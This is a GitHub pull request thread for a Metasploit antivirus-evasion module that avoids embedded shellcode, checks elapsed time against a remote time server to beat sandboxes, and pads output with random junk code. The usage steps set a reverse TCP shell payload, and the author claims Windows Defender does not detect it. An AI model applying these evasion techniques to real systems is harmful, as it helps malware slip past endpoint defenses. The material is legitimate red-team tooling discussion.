Evasion module - no_shellcode/Time obfuscation #18804
Conversation
…work into evasion_module
|
I think it would be better to extract the "junk" functions into a function each, like done in modules/evasion/windows/syscall_inject.rb, and sprinkle them randomly into the c code, instead of hardcoding |
|
Neat, thanks. Seems to target x86 specifically using the mingw stack, wondering if there's any benefit to inclusion of a staging hook for when the time check succeeds either in c or via stager embedding and allow 64b native target. |
Hello, thanks for your comments, |
Hey sempervictus, thanks for your comment, i'm sure this would work on 64b machines thanks |
eg. here. You could do something like this: # Insert a random amount of `junk` on random new lines in `payload`
payload_arr = payload.split("\n")
rand(12..24).times do
payload_arr.insert(rand(0..payload_arr.size), '#{junk_code(1)}')
end
payload = payload_arr.join("\n") |
Thanks, i will put this in the code tomorrow |
This will work on 64b in either target case, most run 32b programs just fine - its how they're run and the heuristic fingerprints of "it" in the target which concern me a bit. Since the evasion is making outbound http calls already, it has most of the api needed to pull an http stager/handoff to a session should the check pass |
well, that will be way more complex than that, must be careful about, the function brackets, if else brackets, do not add junk_code outside function,do not add it in self function an so on what you're suggesting kinda implies a C parser... |
…ific order to compile
Metasm has a basic c parser, might be of use |
|
Randomly replace |
|
i've deleted the and added support for will do the |
|
Is this ready for testing and a formal review? It's still marked as a draft but I see there's been some comments on it. |
|
Hello, it's not ready yet. I Still need to imolement jvoisin's advice on randomizing the junk properly. Would also need a proper way to check for x86 or x64 i'm sure there is a better way than the @ pinst parsing On top of that i would like to embbed another evasion technique I have in mind in it Unfortunately I was quite busy in the last month |
|
That's okay, I'm going to go ahead and attic this then until you have time to make the changes. Once you're ready, just tag be in this PR and I'll happy to reopen it. Thanks! |
smcintyre-r7
added
the
attic
|
Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it What does this generally mean? It could be one or more of several things:
We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this! |
This is a new evasion module, with 2 technique in it ,
No_shellcode : There is no shellcode declared in the file, so no big data array in the .data section
Time obfuscation : The well known technique with a sleep, to check if the sleep is not simulated by the AV product
except that we check for the time from a distant server (worldtimeapi), so no AV will trick us with fake system clock
it also include some random code junk such as fibonnacci calucation, euclidian calculation, or binary search, or random array sorting
windows defender should not block the payload and should not detect it, but when launched and the shell connected in the metasploit listener it then get detected by network traffic or in-memory anlysis
Verification
List the steps needed to make sure this thing works
msfconsoleuse evasion/windows/time_obfuscation_no_shellcodeset payload windows/shell/reverse_tcpset lhost ... ...##VT demo
-> evasion module https://www.virustotal.com/gui/file/24e9fd7219ea3a611947daa93efa95248f2deb15a2e33b8209ea375439c5b366
->regular payload windows/meterpreter/reverse_tcp with msfvenom
https://www.virustotal.com/gui/file/651f07a81c44b38231d6708aa138239e865f8e9f336648b781ad4b8d13f9e92b?nocache=1